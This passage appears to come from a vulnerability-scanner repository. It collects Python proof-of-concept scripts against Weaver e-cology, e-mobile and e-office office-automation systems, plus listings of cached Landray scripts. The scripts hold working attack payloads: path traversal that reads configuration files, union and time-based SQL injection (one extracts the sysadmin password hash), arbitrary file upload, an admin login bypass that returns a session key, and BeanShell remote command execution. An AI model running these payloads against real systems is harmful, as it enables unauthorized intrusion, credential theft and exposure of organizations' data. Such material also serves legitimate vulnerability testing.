19 | vurl = urllib.parse.urljoin(url, "/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties")
20 | try:
21 | response = requests.get(vurl, headers=headers, timeout=5)
22 | if response.status_code == 200 and 'password' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_getLabelByModule_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微e-cology接口getLabelByModule存在sql注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
12 | 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8Accept: */*',
13 | 'Accept-Encoding': 'gzip, deflate, br',
14 | 'Accept-Language': 'zh-CN,zh;q=0.9',
15 | 'Connection': 'close'
16 | }
17 | vurl = urllib.parse.urljoin(url, "/api/ec/dev/locale/getLabelByModule?moduleCode=?moduleCode=?moduleCode=aaa')+union+all+select+'1,1123123'+--")
18 | try:
19 | response = requests.get(vurl, headers=headers, timeout=3)
20 | if response.status_code == 200 and '1123123' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_getsqldata_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': 'Weaver-E-Cology-getSqlData-sqli',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | timeout = 3
11 | headers = {
12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0',
13 | 'Content-Type': 'application/x-www-form-urlencoded',
14 | }
15 | vurl = urllib.parse.urljoin(url, '/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version')
16 | try:
17 | rep = requests.get(vurl, headers=headers, timeout=timeout)
18 | if rep.status_code == 200 and 'Microsoft' in rep.text and 'status":true' in rep.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_jqueryFileTree_direct.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../")
15 | try:
16 | response = requests.get(vurl, headers=headers, timeout=5)
17 | if response.status_code == 200 and 'index.jsp' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_setup_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 |
5 | def verify(url):
6 | relsult = {
7 | 'name': '泛微ecology系统setup接口存在信息泄露漏洞',
8 | 'vulnerable': False,
9 | 'url': url
10 | }
11 | headers = {
12 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Connection': 'close'
15 | }
16 | vurl = urllib.parse.urljoin(url, "/cloudstore/ecode/setup/ecology_dev.zip")
17 | try:
18 | response = requests.get(vurl, headers=headers, timeout=5)
19 | file_size_str = int(response.headers['Content-Length']) / 1024 # KB
20 | if response.status_code == 200:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
27 |
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_v8_sqli.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # 泛微OA V8 前台 SQL注入获取管理员 sysadmin MD5的密码值
3 | # Fofa: app="泛微-协同办公OA"
4 |
5 | import re
6 | import requests
7 | import urllib3
8 | import urllib
9 |
10 |
11 | def verify(url):
12 | relsult = {
13 | 'name': '泛微OA V8前台Sql注入',
14 | 'vulnerable': False
15 | }
16 | target_url = urllib.parse.urljoin(url, "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager")
17 | headers = {
18 | "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36"
19 | }
20 |
21 | try:
22 | urllib3.disable_warnings()
23 | res = requests.get(url=target_url, headers=headers, verify=False, timeout=3)
24 | verify = urllib.parse.urljoin(url, '/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id')
25 | v = requests.get(url=verify, headers=headers, verify=False, timeout=3)
26 | if res.status_code == 200 and 'html' not in res.text and re.search('1234', v.text):
27 | relsult['vulnerable'] = True
28 | relsult['user'] = 'sysadmin'
29 | relsult['MD5(password)'] = res.text.strip()
30 | relsult['payload'] = target_url
31 | return relsult
32 | else:
33 | return relsult
34 | except:
35 | return relsult
36 |
37 |
38 |
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_verifyquicklogin_loginbypass_2022.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import urllib, json
4 |
5 | def verify(url):
6 | result = {
7 | 'name': '泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞(2022HVV)',
8 | 'vulnerable': False
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
12 | 'Content-Type': 'application/x-www-form-urlencoded',
13 | }
14 | timeout = 3
15 | vurl = urllib.parse.urljoin(url, '/mobile/plugin/VerifyQuickLogin.jsp')
16 | payload_data = 'identifier=1&language=1&ipaddress=x.x.x.x'
17 | try:
18 | rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data)
19 | json_rep = json.loads(rep.text)
20 | if len(json_rep['sessionkey']) > 0 and json_rep['message'] == "1":
21 | result['vulnerable'] = True
22 | result['sessionkey'] = json_rep['sessionkey']
23 | return result
24 | except:
25 | return result
26 |
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_client_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_client_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_lang2sql_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_lang2sql_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_messageType_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_messageType_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/emobile/fanwei_emobile_lang2sql_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微移动管理平台lang2sql接口任意文件上传',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Content-Type': 'multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK',
12 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
13 | 'Accept-Language': 'zh-CN,zh;q=0.9',
14 | 'Content-Length': '202',
15 | 'Expect': '100-continue',
16 | 'Connection': 'close'
17 | }
18 | data = '''
19 | ------WebKitFormBoundarymVk33liI64J7GQaK
20 | Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/9SIpL.txt"
21 |
22 | b9Q2Itmn1
23 | ------WebKitFormBoundarymVk33liI64J7GQaK--
24 | '''
25 | vurl = urllib.parse.urljoin(url, "/emp/lang2sql?client_type=1&lang_tag=1")
26 | try:
27 | response = requests.post(vurl, headers=headers, data=data)
28 | if response.status_code == 200 and '未知异常' in response.text:
29 | vurl = urllib.parse.urljoin(url, "/9SIpL.txt")
30 | response = requests.get(vurl, headers=headers, timeout=5)
31 | if response.status_code == 200 and 'b9Q' in response.text:
32 | relsult['vulnerable'] = True
33 | relsult['verify'] = vurl
34 | return relsult
35 | except:
36 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_OfficeServer_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_OfficeServer_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_UploadFile_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_UploadFile_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_UserSelect_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_UserSelect_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_atuh-file_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_atuh-file_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_config_2_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_config_2_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_json_common_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_json_common_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_jx2_config_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_jx2_config_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_leave_record_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_leave_record_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_login_other_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_login_other_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_mobile_upload_save_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_mobile_upload_save_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_schema_mysql_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_schema_mysql_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_uploadify_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_uploadify_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_webservice_file_upload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_webservice_file_upload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_OfficeServer_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-Office10-OfficeServer任意文件上传漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
12 | 'Content-Length': '395',
13 | 'Content-Type': 'image/jpeg',
14 | 'Accept-Encoding': 'gzip, deflate',
15 | 'Connection': 'close',
16 | }
17 | data = '''
18 | ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
19 | Content-Disposition: form-data; name="FileData"; filename="1.jpg"
20 | Content-Type: image/jpeg
21 |
22 |
23 | ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
24 | Content-Disposition: form-data; name="FormData"
25 |
26 | {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test112.php'}
27 | ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
28 | '''
29 | vurl = urllib.parse.urljoin(url, "/eoffice10/server/public/iWebOffice2015/OfficeServer.php")
30 | try:
31 | response = requests.post(vurl, headers=headers, data=data)
32 | if response.status_code == 200:
33 | vurl = f"{url}/eoffice10/server/public/iWebOffice2015/Document/test112.php"
34 | response = requests.get(vurl)
35 | if response.status_code == 200 and 'PHP' in response.text:
36 | relsult['vulnerable'] = True
37 | relsult['verify'] = vurl
38 | return relsult
39 |
40 | except:
41 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_UserSelect_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微e-office系统UserSelect接口存在未授权访问漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Connection':'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/UserSelect/")
16 | try:
17 | response = requests.get(vurl, headers=headers, timeout=5)
18 | if response.status_code == 200 and '所有部门' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_config_2_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微e-office config_2.php未授权访问',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Connection':'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/building/backmgr/urlpage/mobileurl/config_2.php")
16 | try:
17 | response = requests.get(vurl, headers=headers, timeout=5)
18 | if response.status_code == 200 and '数据库名' in response.text and '用户名' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_json_common_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-Office-json_common.phpSQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
12 | 'Connection': 'close',
13 | 'Accept': '*/*',
14 | 'Accept-Language': 'en',
15 | 'Content-Type': 'application/x-www-form-urlencoded',
16 | 'Accept-Encoding': 'gzip'
17 | }
18 | data = '''tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333'''
19 | vurl = urllib.parse.urljoin(url, "/building/json_common.php")
20 | try:
21 | response = requests.post(vurl, headers=headers, data=data)
22 | if response.status_code == 200 and '6cfe798ba8' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_jx2_config_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-Office-jx2_config存在信息泄露漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
13 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
14 | 'Accept-Encoding': 'gzip, deflate',
15 | 'Connection': 'close',
16 | 'Cookie': 'LOGIN_LANG=cn; PHPSESSID=265e1c6495a3bd40146196a1a42cd8dd',
17 | 'Upgrade-Insecure-Requests': '1'
18 | }
19 | vurl = urllib.parse.urljoin(url, "/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini")
20 | try:
21 | response = requests.get(vurl, headers=headers, timeout=3)
22 | if response.status_code == 200 and 'user' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_leave_record_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-office-10接口leave_record.php存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Connection':'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10")
16 | try:
17 | response = requests.get(vurl, headers=headers)
18 | if response.status_code not in range(400, 499) and response.elapsed.total_seconds() > 5:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_login_other_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-Office系统login_other.php存在sql注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Connection':'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, '''/E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,md5(123456),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}''')
16 | try:
17 | response = requests.get(vurl, headers=headers, timeout=5)
18 | if response.status_code == 200 and 'e10adc3949' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_schema_mysql_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Pragma': 'no-cache',
12 | 'Cache-Control': 'no-cache',
13 | 'Upgrade-Insecure-Requests': '1',
14 | 'User-Agent': 'Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/120.0.0.0Safari/537.36',
15 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7',
16 | 'Accept-Encoding': 'gzip,deflate',
17 | 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
18 | 'Connection': 'close',
19 | 'Content-Type': 'application/x-www-form-urlencoded'
20 | }
21 | vurl = urllib.parse.urljoin(url, "/eoffice10/empty_scene/db/schema_mysql.sql")
22 | try:
23 | response = requests.get(vurl, headers=headers, timeout=5)
24 | if response.status_code == 200 and 'CREATE' in response.text:
25 | relsult['vulnerable'] = True
26 | relsult['verify'] = vurl
27 | return relsult
28 |
29 | except:
30 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/fanwei_Bsh_rce.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
3 | # Fofa: app="泛微-协同办公OA"
4 | import requests
5 | import sys,re
6 | import urllib
7 |
8 |
9 | def verify(target):
10 | relsult = {
11 | 'name': '泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204',
12 | 'vulnerable': False
13 | }
14 | headers = {
15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
16 | 'Content-Type': 'application/x-www-form-urlencoded',
17 | }
18 | target = urllib.parse.urljoin(target, "weaver/bsh.servlet.BshServlet")
19 | payload = """bsh.script=\\u0065\\u0078\\u0065\\u0063("whoami");&bsh.servlet.output=raw"""
20 | try:
21 | requests.packages.urllib3.disable_warnings()
22 | request = requests.post(headers=headers, url=target, data=payload, timeout=5, verify=False)
23 | if ";" not in request.text and re.search('BeanShell', request.text):
24 | if "Login.jsp" not in request.text:
25 | if "Error" not in request.text:
26 | if "" not in request.text:
27 | relsult['vulnerable'] = True
28 | relsult['url'] = target
29 | relsult['method'] = 'POST'
30 | relsult['payload'] = payload
31 | return relsult
32 | return relsult
33 | except:
34 | return relsult
35 |
36 |
37 |
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray-eis-doc_fileedit_word-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray-eis-doc_fileedit_word-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray-eis-frm_button_func-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray-eis-frm_button_func-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray-eis-rpt_listreport_definefield-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray-eis-rpt_listreport_definefield-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa-dataxml_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa-dataxml_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa_WechatLoginHelper_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa_WechatLoginHelper_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa_admindo_jndiinject_2021.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa_admindo_jndiinject_2021.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa_custom_jsp_fileread.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa_custom_jsp_fileread.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa_treexml_rce_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa_treexml_rce_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_sysUiComponent_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_sysUiComponent_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_treexml_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_treexml_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-ShowUserInfo-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
